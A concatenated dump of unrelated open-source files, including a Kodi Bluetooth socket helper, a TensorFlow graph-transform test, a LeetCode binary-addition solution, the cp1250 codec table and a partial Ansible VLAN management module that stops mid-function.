refs/heads/master
|
kodi_14.1_release/tools/EventClients/lib/python/bt/bt.py
|
181
|
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2013 Team XBMC
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
BLUEZ=0
try:
import bluetooth
BLUEZ=1
except:
try:
import lightblue
except:
print "ERROR: You need to have either LightBlue or PyBluez installed\n"\
" in order to use this program."
print "- PyBluez (Linux / Windows XP) http://org.csail.mit.edu/pybluez/"
print "- LightBlue (Mac OS X / Linux) http://lightblue.sourceforge.net/"
exit()
def bt_create_socket():
if BLUEZ:
sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
else:
sock = lightblue.socket(lightblue.L2CAP)
return sock
def bt_create_rfcomm_socket():
if BLUEZ:
sock = bluetooth.BluetoothSocket( bluetooth.RFCOMM )
sock.bind(("",bluetooth.PORT_ANY))
else:
sock = lightblue.socket(lightblue.RFCOMM)
sock.bind(("",0))
return sock
def bt_discover_devices():
if BLUEZ:
nearby = bluetooth.discover_devices()
else:
nearby = lightblue.finddevices()
return nearby
def bt_lookup_name(bdaddr):
if BLUEZ:
bname = bluetooth.lookup_name( bdaddr )
else:
bname = bdaddr[1]
return bname
def bt_lookup_addr(bdaddr):
if BLUEZ:
return bdaddr
else:
return bdaddr[0]
def bt_advertise(name, uuid, socket):
if BLUEZ:
bluetooth.advertise_service( socket, name,
service_id = uuid,
service_classes = [ uuid, bluetooth.SERIAL_PORT_CLASS ],
profiles = [ bluetooth.SERIAL_PORT_PROFILE ] )
else:
lightblue.advertise(name, socket, lightblue.RFCOMM)
def bt_stop_advertising(socket):
if BLUEZ:
        bluetooth.stop_advertising(socket)
else:
lightblue.stopadvertise(socket)
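# Usage sketch (needs PyBluez or LightBlue plus local bluetooth hardware):
#
#   sock = bt_create_rfcomm_socket()
#   for dev in bt_discover_devices():
#       print bt_lookup_addr(dev), bt_lookup_name(dev)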
|
jhaux/tensorflow
|
refs/heads/master
|
tensorflow/tools/graph_transforms/python/transform_graph_test.py
|
169
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for StatSummarizer Python wrapper."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_util
from tensorflow.python.platform import test
from tensorflow.tools.graph_transforms import TransformGraph
class TransformGraphTest(test.TestCase):
# This test constructs a graph with a relu op that's not used by the normal
# inference path, and then tests that the strip_unused transform removes it as
# expected.
def testTransformGraph(self):
input_graph_def = graph_pb2.GraphDef()
const_op1 = input_graph_def.node.add()
const_op1.op = "Const"
const_op1.name = "const_op1"
const_op1.attr["dtype"].CopyFrom(attr_value_pb2.AttrValue(
type=dtypes.float32.as_datatype_enum))
const_op1.attr["value"].CopyFrom(
attr_value_pb2.AttrValue(tensor=tensor_util.make_tensor_proto(
[1, 2], dtypes.float32, [1, 2])))
const_op2 = input_graph_def.node.add()
const_op2.op = "Const"
const_op2.name = "const_op2"
const_op2.attr["dtype"].CopyFrom(attr_value_pb2.AttrValue(
type=dtypes.float32.as_datatype_enum))
const_op2.attr["value"].CopyFrom(
attr_value_pb2.AttrValue(tensor=tensor_util.make_tensor_proto(
[3, 4], dtypes.float32, [1, 2])))
# Create an add that has two constants as inputs.
add_op = input_graph_def.node.add()
add_op.op = "Add"
add_op.attr["T"].CopyFrom(attr_value_pb2.AttrValue(
type=dtypes.float32.as_datatype_enum))
add_op.name = "add_op"
add_op.input.extend(["const_op1", "const_op2"])
# Create a relu that reads from the add.
relu_op = input_graph_def.node.add()
relu_op.op = "Relu"
relu_op.attr["T"].CopyFrom(attr_value_pb2.AttrValue(
type=dtypes.float32.as_datatype_enum))
relu_op.name = "relu_op"
relu_op.input.extend(["add_op"])
# We're specifying that add_op is the final output, and so the relu isn't
# needed.
input_names = []
output_names = ["add_op"]
transforms = ["strip_unused_nodes"]
transformed_graph_def = TransformGraph(input_graph_def, input_names,
output_names, transforms)
# We expect that the relu is no longer present after running the transform.
for node in transformed_graph_def.node:
self.assertNotEqual("Relu", node.op)
if __name__ == "__main__":
test.main()
|
quietcoolwu/leetcode-python
|
refs/heads/master
|
add_binary/solution2.py
|
6
|
class Solution:
# @param a, a string
# @param b, a string
# @return a string
def addBinary(self, a, b):
list_a = [int(i) for i in a[::-1]]
list_b = [int(i) for i in b[::-1]]
la = len(list_a)
lb = len(list_b)
# Pad zeroes
if la < lb:
list_a += [0 for i in range(lb - la)]
la = len(list_a)
else:
list_b += [0 for i in range(la - lb)]
lb = len(list_b)
carry = 0
res = []
for i in range(la):
t = (list_a[i] + list_b[i] + carry) % 2
            carry = (list_a[i] + list_b[i] + carry) // 2  # floor division keeps the carry integral on Python 3 too
res.append(t)
if carry == 1:
res.append(1)
return ''.join([str(d) for d in res[::-1]])
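# Usage sketch: binary addition with carry, padding the shorter operand.
#
#   Solution().addBinary('11', '1')       # -> '100'
#   Solution().addBinary('1010', '1011')  # -> '10101'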
|
vlachoudis/sl4a
|
refs/heads/master
|
python/src/Lib/encodings/cp1250.py
|
593
|
""" Python Character Mapping Codec cp1250 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1250.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp1250',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\u20ac' # 0x80 -> EURO SIGN
u'\ufffe' # 0x81 -> UNDEFINED
u'\u201a' # 0x82 -> SINGLE LOW-9 QUOTATION MARK
u'\ufffe' # 0x83 -> UNDEFINED
u'\u201e' # 0x84 -> DOUBLE LOW-9 QUOTATION MARK
u'\u2026' # 0x85 -> HORIZONTAL ELLIPSIS
u'\u2020' # 0x86 -> DAGGER
u'\u2021' # 0x87 -> DOUBLE DAGGER
u'\ufffe' # 0x88 -> UNDEFINED
u'\u2030' # 0x89 -> PER MILLE SIGN
u'\u0160' # 0x8A -> LATIN CAPITAL LETTER S WITH CARON
u'\u2039' # 0x8B -> SINGLE LEFT-POINTING ANGLE QUOTATION MARK
u'\u015a' # 0x8C -> LATIN CAPITAL LETTER S WITH ACUTE
u'\u0164' # 0x8D -> LATIN CAPITAL LETTER T WITH CARON
u'\u017d' # 0x8E -> LATIN CAPITAL LETTER Z WITH CARON
u'\u0179' # 0x8F -> LATIN CAPITAL LETTER Z WITH ACUTE
u'\ufffe' # 0x90 -> UNDEFINED
u'\u2018' # 0x91 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0x92 -> RIGHT SINGLE QUOTATION MARK
u'\u201c' # 0x93 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0x94 -> RIGHT DOUBLE QUOTATION MARK
u'\u2022' # 0x95 -> BULLET
u'\u2013' # 0x96 -> EN DASH
u'\u2014' # 0x97 -> EM DASH
u'\ufffe' # 0x98 -> UNDEFINED
u'\u2122' # 0x99 -> TRADE MARK SIGN
u'\u0161' # 0x9A -> LATIN SMALL LETTER S WITH CARON
u'\u203a' # 0x9B -> SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
u'\u015b' # 0x9C -> LATIN SMALL LETTER S WITH ACUTE
u'\u0165' # 0x9D -> LATIN SMALL LETTER T WITH CARON
u'\u017e' # 0x9E -> LATIN SMALL LETTER Z WITH CARON
u'\u017a' # 0x9F -> LATIN SMALL LETTER Z WITH ACUTE
u'\xa0' # 0xA0 -> NO-BREAK SPACE
u'\u02c7' # 0xA1 -> CARON
u'\u02d8' # 0xA2 -> BREVE
u'\u0141' # 0xA3 -> LATIN CAPITAL LETTER L WITH STROKE
u'\xa4' # 0xA4 -> CURRENCY SIGN
u'\u0104' # 0xA5 -> LATIN CAPITAL LETTER A WITH OGONEK
u'\xa6' # 0xA6 -> BROKEN BAR
u'\xa7' # 0xA7 -> SECTION SIGN
u'\xa8' # 0xA8 -> DIAERESIS
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u015e' # 0xAA -> LATIN CAPITAL LETTER S WITH CEDILLA
u'\xab' # 0xAB -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xac' # 0xAC -> NOT SIGN
u'\xad' # 0xAD -> SOFT HYPHEN
u'\xae' # 0xAE -> REGISTERED SIGN
u'\u017b' # 0xAF -> LATIN CAPITAL LETTER Z WITH DOT ABOVE
u'\xb0' # 0xB0 -> DEGREE SIGN
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\u02db' # 0xB2 -> OGONEK
u'\u0142' # 0xB3 -> LATIN SMALL LETTER L WITH STROKE
u'\xb4' # 0xB4 -> ACUTE ACCENT
u'\xb5' # 0xB5 -> MICRO SIGN
u'\xb6' # 0xB6 -> PILCROW SIGN
u'\xb7' # 0xB7 -> MIDDLE DOT
u'\xb8' # 0xB8 -> CEDILLA
u'\u0105' # 0xB9 -> LATIN SMALL LETTER A WITH OGONEK
u'\u015f' # 0xBA -> LATIN SMALL LETTER S WITH CEDILLA
u'\xbb' # 0xBB -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u013d' # 0xBC -> LATIN CAPITAL LETTER L WITH CARON
u'\u02dd' # 0xBD -> DOUBLE ACUTE ACCENT
u'\u013e' # 0xBE -> LATIN SMALL LETTER L WITH CARON
u'\u017c' # 0xBF -> LATIN SMALL LETTER Z WITH DOT ABOVE
u'\u0154' # 0xC0 -> LATIN CAPITAL LETTER R WITH ACUTE
u'\xc1' # 0xC1 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xc2' # 0xC2 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\u0102' # 0xC3 -> LATIN CAPITAL LETTER A WITH BREVE
u'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\u0139' # 0xC5 -> LATIN CAPITAL LETTER L WITH ACUTE
u'\u0106' # 0xC6 -> LATIN CAPITAL LETTER C WITH ACUTE
u'\xc7' # 0xC7 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\u010c' # 0xC8 -> LATIN CAPITAL LETTER C WITH CARON
u'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\u0118' # 0xCA -> LATIN CAPITAL LETTER E WITH OGONEK
u'\xcb' # 0xCB -> LATIN CAPITAL LETTER E WITH DIAERESIS
u'\u011a' # 0xCC -> LATIN CAPITAL LETTER E WITH CARON
u'\xcd' # 0xCD -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xce' # 0xCE -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
u'\u010e' # 0xCF -> LATIN CAPITAL LETTER D WITH CARON
u'\u0110' # 0xD0 -> LATIN CAPITAL LETTER D WITH STROKE
u'\u0143' # 0xD1 -> LATIN CAPITAL LETTER N WITH ACUTE
u'\u0147' # 0xD2 -> LATIN CAPITAL LETTER N WITH CARON
u'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xd4' # 0xD4 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\u0150' # 0xD5 -> LATIN CAPITAL LETTER O WITH DOUBLE ACUTE
u'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xd7' # 0xD7 -> MULTIPLICATION SIGN
u'\u0158' # 0xD8 -> LATIN CAPITAL LETTER R WITH CARON
u'\u016e' # 0xD9 -> LATIN CAPITAL LETTER U WITH RING ABOVE
u'\xda' # 0xDA -> LATIN CAPITAL LETTER U WITH ACUTE
u'\u0170' # 0xDB -> LATIN CAPITAL LETTER U WITH DOUBLE ACUTE
u'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xdd' # 0xDD -> LATIN CAPITAL LETTER Y WITH ACUTE
u'\u0162' # 0xDE -> LATIN CAPITAL LETTER T WITH CEDILLA
u'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S
u'\u0155' # 0xE0 -> LATIN SMALL LETTER R WITH ACUTE
u'\xe1' # 0xE1 -> LATIN SMALL LETTER A WITH ACUTE
u'\xe2' # 0xE2 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\u0103' # 0xE3 -> LATIN SMALL LETTER A WITH BREVE
u'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
u'\u013a' # 0xE5 -> LATIN SMALL LETTER L WITH ACUTE
u'\u0107' # 0xE6 -> LATIN SMALL LETTER C WITH ACUTE
u'\xe7' # 0xE7 -> LATIN SMALL LETTER C WITH CEDILLA
u'\u010d' # 0xE8 -> LATIN SMALL LETTER C WITH CARON
u'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
u'\u0119' # 0xEA -> LATIN SMALL LETTER E WITH OGONEK
u'\xeb' # 0xEB -> LATIN SMALL LETTER E WITH DIAERESIS
u'\u011b' # 0xEC -> LATIN SMALL LETTER E WITH CARON
u'\xed' # 0xED -> LATIN SMALL LETTER I WITH ACUTE
u'\xee' # 0xEE -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\u010f' # 0xEF -> LATIN SMALL LETTER D WITH CARON
u'\u0111' # 0xF0 -> LATIN SMALL LETTER D WITH STROKE
u'\u0144' # 0xF1 -> LATIN SMALL LETTER N WITH ACUTE
u'\u0148' # 0xF2 -> LATIN SMALL LETTER N WITH CARON
u'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
u'\xf4' # 0xF4 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\u0151' # 0xF5 -> LATIN SMALL LETTER O WITH DOUBLE ACUTE
u'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf7' # 0xF7 -> DIVISION SIGN
u'\u0159' # 0xF8 -> LATIN SMALL LETTER R WITH CARON
u'\u016f' # 0xF9 -> LATIN SMALL LETTER U WITH RING ABOVE
u'\xfa' # 0xFA -> LATIN SMALL LETTER U WITH ACUTE
u'\u0171' # 0xFB -> LATIN SMALL LETTER U WITH DOUBLE ACUTE
u'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
u'\xfd' # 0xFD -> LATIN SMALL LETTER Y WITH ACUTE
u'\u0163' # 0xFE -> LATIN SMALL LETTER T WITH CEDILLA
u'\u02d9' # 0xFF -> DOT ABOVE
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
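### Usage sketch (the stdlib registers this codec, so the tables above back
### ordinary encode/decode calls):
###
###   u'\u0141\xf3d\u017a'.encode('cp1250')  # -> '\xa3\xf3d\x9f'
###   '\xa3'.decode('cp1250')                # -> u'\u0141'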
|
emoronayuso/beeton
|
refs/heads/master
|
asterisk-bee/asteriskbee/api_colas_llamadas/views.py
|
6027
|
# Create your views here.
|
toshywoshy/ansible
|
refs/heads/devel
|
lib/ansible/modules/cloud/dimensiondata/dimensiondata_vlan.py
|
21
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Dimension Data
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
#
# Authors:
# - Adam Friedman <tintoy@tintoy.io>
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {
'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'
}
DOCUMENTATION = '''
---
module: dimensiondata_vlan
short_description: Manage a VLAN in a Cloud Control network domain.
extends_documentation_fragment:
- dimensiondata
- dimensiondata_wait
description:
- Manage VLANs in Cloud Control network domains.
version_added: "2.5"
author: 'Adam Friedman (@tintoy)'
options:
name:
description:
- The name of the target VLAN.
- Required if C(state) is C(present).
description:
description:
- A description of the VLAN.
network_domain:
description:
- The Id or name of the target network domain.
required: true
private_ipv4_base_address:
description:
- The base address for the VLAN's IPv4 network (e.g. 192.168.1.0).
private_ipv4_prefix_size:
description:
- The size of the IPv4 address space, e.g 24.
- Required, if C(private_ipv4_base_address) is specified.
state:
description:
- The desired state for the target VLAN.
- C(readonly) ensures that the state is only ever read, not modified (the module will fail if the resource does not exist).
choices: [present, absent, readonly]
default: present
allow_expand:
description:
- Permit expansion of the target VLAN's network if the module parameters specify a larger network than the VLAN currently possesses.
- If C(False), the module will fail under these conditions.
- This is intended to prevent accidental expansion of a VLAN's network (since this operation is not reversible).
type: bool
default: 'no'
'''
EXAMPLES = '''
# Add or update VLAN
- dimensiondata_vlan:
region: na
location: NA5
network_domain: test_network
name: my_vlan1
description: A test VLAN
private_ipv4_base_address: 192.168.23.0
private_ipv4_prefix_size: 24
state: present
wait: yes
# Read / get VLAN details
- dimensiondata_vlan:
region: na
location: NA5
network_domain: test_network
name: my_vlan1
state: readonly
wait: yes
# Delete a VLAN
- dimensiondata_vlan:
region: na
location: NA5
network_domain: test_network
name: my_vlan_1
state: absent
wait: yes
'''
RETURN = '''
vlan:
description: Dictionary describing the VLAN.
returned: On success when I(state) is 'present'
type: complex
contains:
id:
description: VLAN ID.
type: str
sample: "aaaaa000-a000-4050-a215-2808934ccccc"
name:
description: VLAN name.
type: str
sample: "My VLAN"
description:
description: VLAN description.
type: str
sample: "My VLAN description"
location:
description: Datacenter location.
type: str
sample: NA3
private_ipv4_base_address:
description: The base address for the VLAN's private IPV4 network.
type: str
sample: 192.168.23.0
private_ipv4_prefix_size:
description: The prefix size for the VLAN's private IPV4 network.
type: int
sample: 24
private_ipv4_gateway_address:
description: The gateway address for the VLAN's private IPV4 network.
type: str
sample: 192.168.23.1
private_ipv6_base_address:
description: The base address for the VLAN's IPV6 network.
type: str
sample: 2402:9900:111:1195:0:0:0:0
private_ipv6_prefix_size:
description: The prefix size for the VLAN's IPV6 network.
type: int
sample: 64
private_ipv6_gateway_address:
description: The gateway address for the VLAN's IPV6 network.
type: str
sample: 2402:9900:111:1195:0:0:0:1
status:
description: VLAN status.
type: str
sample: NORMAL
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.dimensiondata import DimensionDataModule, UnknownNetworkError
try:
from libcloud.common.dimensiondata import DimensionDataVlan, DimensionDataAPIException
HAS_LIBCLOUD = True
except ImportError:
DimensionDataVlan = None
HAS_LIBCLOUD = False
class DimensionDataVlanModule(DimensionDataModule):
"""
The dimensiondata_vlan module for Ansible.
"""
def __init__(self):
"""
Create a new Dimension Data VLAN module.
"""
super(DimensionDataVlanModule, self).__init__(
module=AnsibleModule(
argument_spec=DimensionDataModule.argument_spec_with_wait(
name=dict(required=True, type='str'),
description=dict(default='', type='str'),
network_domain=dict(required=True, type='str'),
private_ipv4_base_address=dict(default='', type='str'),
private_ipv4_prefix_size=dict(default=0, type='int'),
allow_expand=dict(required=False, default=False, type='bool'),
state=dict(default='present', choices=['present', 'absent', 'readonly'])
),
required_together=DimensionDataModule.required_together()
)
)
self.name = self.module.params['name']
self.description = self.module.params['description']
self.network_domain_selector = self.module.params['network_domain']
self.private_ipv4_base_address = self.module.params['private_ipv4_base_address']
self.private_ipv4_prefix_size = self.module.params['private_ipv4_prefix_size']
self.state = self.module.params['state']
self.allow_expand = self.module.params['allow_expand']
if self.wait and self.state != 'present':
self.module.fail_json(
msg='The wait parameter is only supported when state is "present".'
)
def state_present(self):
"""
Ensure that the target VLAN is present.
"""
network_domain = self._get_network_domain()
vlan = self._get_vlan(network_domain)
if not vlan:
if self.module.check_mode:
self.module.exit_json(
msg='VLAN "{0}" is absent from network domain "{1}" (should be present).'.format(
self.name, self.network_domain_selector
),
changed=True
)
vlan = self._create_vlan(network_domain)
self.module.exit_json(
msg='Created VLAN "{0}" in network domain "{1}".'.format(
self.name, self.network_domain_selector
),
vlan=vlan_to_dict(vlan),
changed=True
)
else:
diff = VlanDiff(vlan, self.module.params)
if not diff.has_changes():
self.module.exit_json(
msg='VLAN "{0}" is present in network domain "{1}" (no changes detected).'.format(
self.name, self.network_domain_selector
),
vlan=vlan_to_dict(vlan),
changed=False
)
return
try:
diff.ensure_legal_change()
except InvalidVlanChangeError as invalid_vlan_change:
self.module.fail_json(
msg='Unable to update VLAN "{0}" in network domain "{1}": {2}'.format(
self.name, self.network_domain_selector, invalid_vlan_change
)
)
if diff.needs_expand() and not self.allow_expand:
self.module.fail_json(
msg='The configured private IPv4 network size ({0}-bit prefix) for '.format(
self.private_ipv4_prefix_size
) + 'the VLAN differs from its current network size ({0}-bit prefix) '.format(
vlan.private_ipv4_range_size
) + 'and needs to be expanded. Use allow_expand=true if this is what you want.'
)
if self.module.check_mode:
self.module.exit_json(
msg='VLAN "{0}" is present in network domain "{1}" (changes detected).'.format(
self.name, self.network_domain_selector
),
vlan=vlan_to_dict(vlan),
changed=True
)
if diff.needs_edit():
vlan.name = self.name
vlan.description = self.description
self.driver.ex_update_vlan(vlan)
if diff.needs_expand():
vlan.private_ipv4_range_size = self.private_ipv4_prefix_size
self.driver.ex_expand_vlan(vlan)
self.module.exit_json(
msg='Updated VLAN "{0}" in network domain "{1}".'.format(
self.name, self.network_domain_selector
),
vlan=vlan_to_dict(vlan),
changed=True
)
def state_readonly(self):
"""
Read the target VLAN's state.
"""
network_domain = self._get_network_domain()
vlan = self._get_vlan(network_domain)
if vlan:
self.module.exit_json(
vlan=vlan_to_dict(vlan),
changed=False
)
else:
self.module.fail_json(
msg='VLAN "{0}" does not exist in network domain "{1}".'.format(
self.name, self.network_domain_selector
)
)
def state_absent(self):
"""
Ensure that the target VLAN is not present.
"""
network_domain = self._get_network_domain()
vlan = self._get_vlan(network_domain)
if not vlan:
self.module.exit_json(
msg='VLAN "{0}" is absent from network domain "{1}".'.format(
